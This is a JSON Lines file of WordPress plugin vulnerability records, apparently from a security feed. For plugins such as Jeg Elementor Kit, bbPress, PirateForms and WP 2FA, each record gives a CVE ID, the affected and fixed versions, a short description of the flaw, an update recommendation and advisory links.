{"CVE_ID":"CVE-2024-13217","slug":"jeg-elementor-kit","versionImpact":"2.6.11","versionEndExcluding":"2.6.12","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.11 via the 'expired_data' and 'build_content' functions. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data.","recommendation":"Update to version 2.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-countdown-view.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-countdown-view.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-off-canvas-view.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-off-canvas-view.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246154\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246154\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2136cad8-6b0b-4458-a357-6e98f1ac3e0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2136cad8-6b0b-4458-a357-6e98f1ac3e0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1435","slug":"bbpress","versionImpact":"2.6.11","versionEndExcluding":"2.6.12","description":"The bbPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.11. This is due to missing or incorrect nonce validation on the bbp_user_add_role_on_register() function. This makes it possible for unauthenticated attackers to elevate their privileges to that of a bbPress Keymaster via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Rather than implementing a nonce check to provide protection against this vulnerability, which would break functionality, the plugin no longer makes it possible to select a role during registration.","recommendation":"Update to version 2.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbpress\\\/trunk\\\/includes\\\/users\\\/signups.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbpress\\\/trunk\\\/includes\\\/users\\\/signups.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247345\\\/bbpress\\\/branches\\\/2.6\\\/includes\\\/users\\\/capabilities.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247345\\\/bbpress\\\/branches\\\/2.6\\\/includes\\\/users\\\/capabilities.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247345%40bbpress&new=3247345%40bbpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247345%40bbpress&new=3247345%40bbpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d776d94-8c81-4e88-bae3-946824a75c09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d776d94-8c81-4e88-bae3-946824a75c09?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3725","slug":"otter-blocks","versionImpact":"2.6.9","versionEndExcluding":"2.6.10","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Grid widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes such as 'titleTag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb041f6-b88a-495a-8f5f-7f39f640748d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb041f6-b88a-495a-8f5f-7f39f640748d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071504\\\/otter-blocks\\\/trunk\\\/inc\\\/render\\\/class-posts-grid-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071504\\\/otter-blocks\\\/trunk\\\/inc\\\/render\\\/class-posts-grid-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8899","slug":"jeg-elementor-kit","versionImpact":"2.6.9","versionEndExcluding":"2.6.10","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the render_content function in class\/elements\/views\/class-tabs-view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 2.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4efc9c47-321a-4635-943f-785ffc34d851?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4efc9c47-321a-4635-943f-785ffc34d851?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10308","slug":"jeg-elementor-kit","versionImpact":"2.6.9","versionEndExcluding":"2.6.10","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Countdown widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4602","slug":"namaste-lms","versionImpact":"2.6.1.1","versionEndExcluding":"2.6.1.2","description":"The Namaste! LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'course_id' parameter in versions up to, and including, 2.6.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d014f512-9030-49ce-945d-4900594fb373?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d014f512-9030-49ce-945d-4900594fb373?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1wliD7YvLqL2xWnR6jLEnWgoWRKsv9dCI\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1wliD7YvLqL2xWnR6jLEnWgoWRKsv9dCI\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966178\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966178\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36723","slug":"listingpro","versionEndExcluding":"2.6.1","description":"The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~\/listingpro-plugin\/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-listingpro-theme-fixed-a-critical-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-listingpro-theme-fixed-a-critical-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9b21f8e-8d66-4d3e-a383-bea20a3c4498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9b21f8e-8d66-4d3e-a383-bea20a3c4498?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/listingpro-multipurpose-directory-theme\\\/19386460\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/listingpro-multipurpose-directory-theme\\\/19386460\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6165","slug":"notifier","versionImpact":"2.6","versionEndExcluding":"2.6.1","description":"The WANotifier WordPress plugin before 2.6.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e6648a-9d19-4e73-ad6c-f727802d8dd5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e6648a-9d19-4e73-ad6c-f727802d8dd5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0095","slug":"page-views-count","versionEndExcluding":"2.6.1","description":"The Page View Count WordPress plugin before 2.6.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009ca72e-e8fa-4fdc-ab2d-4210f8f4710f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009ca72e-e8fa-4fdc-ab2d-4210f8f4710f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13453","slug":"pirate-forms","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The Contact Form & SMTP Plugin for WordPress by PirateForms plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.6.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pirate-forms\\\/tags\\\/2.6.0\\\/gutenberg\\\/class-pirateforms-gutenberg.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pirate-forms\\\/tags\\\/2.6.0\\\/gutenberg\\\/class-pirateforms-gutenberg.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225666%40pirate-forms&old=3219203%40pirate-forms&sfp_email=&sfph_mail=#file163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225666%40pirate-forms&old=3219203%40pirate-forms&sfp_email=&sfph_mail=#file163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98859214-7acf-4d40-9291-b5669b9614b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98859214-7acf-4d40-9291-b5669b9614b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8397","slug":"webtoffee-gdpr-cookie-consent","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The webtoffee-gdpr-cookie-consent WordPress plugin before 2.6.1 does not properly sanitize and escape the IP headers when logging them, allowing visitors to conduct Stored Cross-Site Scripting attacks. The payload gets triggered when an admin visits the 'Consent report' page and the malicious script is executed in the admin context.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/847fbf5d-f7cf-49fd-88bc-d7fa2a8110bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/847fbf5d-f7cf-49fd-88bc-d7fa2a8110bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8286","slug":"webtoffee-gdpr-cookie-consent","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The webtoffee-gdpr-cookie-consent WordPress plugin before 2.6.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting visit logs via CSRF attacks.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/628bbac0-76b1-4666-9c00-bae84b48f85c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/628bbac0-76b1-4666-9c00-bae84b48f85c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13593","slug":"bmlt-meeting-map","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The BMLT Meeting Map plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.6.0 via the 'bmlt_meeting_map' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/trunk\\\/meeting_map.php#L510\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/trunk\\\/meeting_map.php#L510\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226454%40bmlt-meeting-map&new=3226454%40bmlt-meeting-map&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226454%40bmlt-meeting-map&new=3226454%40bmlt-meeting-map&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22e5765-54bd-4677-947c-8a7c48bdf65b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22e5765-54bd-4677-947c-8a7c48bdf65b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6506","slug":"wp-2fa","versionImpact":"2.5.0","versionEndExcluding":"2.6.0","description":"The WP 2FA \u2013 Two-factor authentication for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.5.0 via the send_backup_codes_email due to missing validation on a user controlled key. This makes it possible for subscriber-level attackers to email arbitrary users on the site.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caff9be6-4161-47a0-ba47-6c8fc0c4ab40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caff9be6-4161-47a0-ba47-6c8fc0c4ab40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11688","slug":"latex2html","versionImpact":"2.5.5","versionEndExcluding":"2.6.0","description":"The LaTeX2HTML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ver' or 'date' parameter in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latex2html\\\/trunk\\\/inc\\\/html\\\/manual.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latex2html\\\/trunk\\\/inc\\\/html\\\/manual.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9af8b-1168-462d-a767-d16ee660f646?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9af8b-1168-462d-a767-d16ee660f646?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4750","slug":"buddyboss-platform","versionImpact":"2.5.91","versionEndExcluding":"2.6.0","description":"The buddyboss-platform WordPress plugin before 2.6.0 contains an IDOR vulnerability that allows a user to like a private post by manipulating the ID included in the request","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbe4034-842b-43b0-97d1-208811376dea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbe4034-842b-43b0-97d1-208811376dea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11273","slug":"pirate-forms","versionImpact":"2.5.2","versionEndExcluding":"2.6.0","description":"The Contact Form & SMTP Plugin for WordPress by PirateForms WordPress plugin before 2.6.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1049a83-1298-4c8c-aeac-0055110d38fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1049a83-1298-4c8c-aeac-0055110d38fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11272","slug":"pirate-forms","versionImpact":"2.5.2","versionEndExcluding":"2.6.0","description":"The Contact Form & SMTP Plugin for WordPress by PirateForms WordPress plugin before 2.6.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7a76794-bc7d-42d6-9e7d-d7b845a7f461\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7a76794-bc7d-42d6-9e7d-d7b845a7f461\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12464","slug":"chatroll-live-chat","versionImpact":"2.5.0","versionEndExcluding":"2.6.0","description":"The Chatroll Live Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'chatroll' shortcode in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatroll-live-chat\\\/tags\\\/2.5.0\\\/chatroll.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatroll-live-chat\\\/tags\\\/2.5.0\\\/chatroll.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87fdadcd-b776-471a-9756-708e384de4f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87fdadcd-b776-471a-9756-708e384de4f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6520","slug":"wp-2fa","versionImpact":"2.5.0","versionEndExcluding":"2.6.0","description":"The WP 2FA \u2013 Two-factor authentication for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.0. This is due to missing or incorrect nonce validation on the send_backup_codes_email function. This makes it possible for unauthenticated attackers to send emails with arbitrary content to registered users via a forged request granted they can trick a site administrator or other registered user into performing an action such as clicking on a link. While a nonce check is present, it is only executed if a nonce is set. By omitting a nonce from the request, the check can be bypassed.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0af451be-2477-453c-a230-7f3fb804398b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0af451be-2477-453c-a230-7f3fb804398b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12336","slug":"wc-affiliate","versionImpact":"2.5.3","versionEndExcluding":"2.6","description":"The WC Affiliate \u2013 A Complete WooCommerce Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'export_all_data' function in all versions up to, and including, 2.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive affiliate data, including personally identifiable information (PII).","recommendation":"Update to version 2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-affiliate\\\/trunk\\\/src\\\/AJAX.php#L903\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-affiliate\\\/trunk\\\/src\\\/AJAX.php#L903\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0fb349-4cb8-4cf3-ae7c-5c4dcc6fd4f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0fb349-4cb8-4cf3-ae7c-5c4dcc6fd4f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0844","slug":"namaste-lms","versionEndExcluding":"2.6","description":"The Namaste! LMS WordPress plugin before 2.6 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d8e5852-3787-47f9-9931-8308bb81beb1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d8e5852-3787-47f9-9931-8308bb81beb1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12255","slug":"accept-stripe-payments-using-contact-form-7","versionImpact":"2.5","versionEndExcluding":"2.6","description":"The Accept Stripe Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via the cf7sa-info.php file that returns phpinfo() data. This makes it possible for unauthenticated attackers to extract configuration information that can be leveraged in another attack.","recommendation":"Update to version 2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205295%40accept-stripe-payments-using-contact-form-7&new=3205295%40accept-stripe-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205295%40accept-stripe-payments-using-contact-form-7&new=3205295%40accept-stripe-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a9e1325-1027-41ea-93be-c321aef61dea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a9e1325-1027-41ea-93be-c321aef61dea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0201","slug":"product-expiry-for-woocommerce","versionEndExcluding":"2.6","description":"The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_settings' function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4006612-770a-482f-a8c2-e62f607914a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4006612-770a-482f-a8c2-e62f607914a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.5\\\/product-expiry-for-woocommerce.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.5\\\/product-expiry-for-woocommerce.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.6\\\/product-expiry-for-woocommerce.php?rev=3014924#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.6\\\/product-expiry-for-woocommerce.php?rev=3014924#L263\",\"refsource\":\"\",\"tags\":[]}]"}
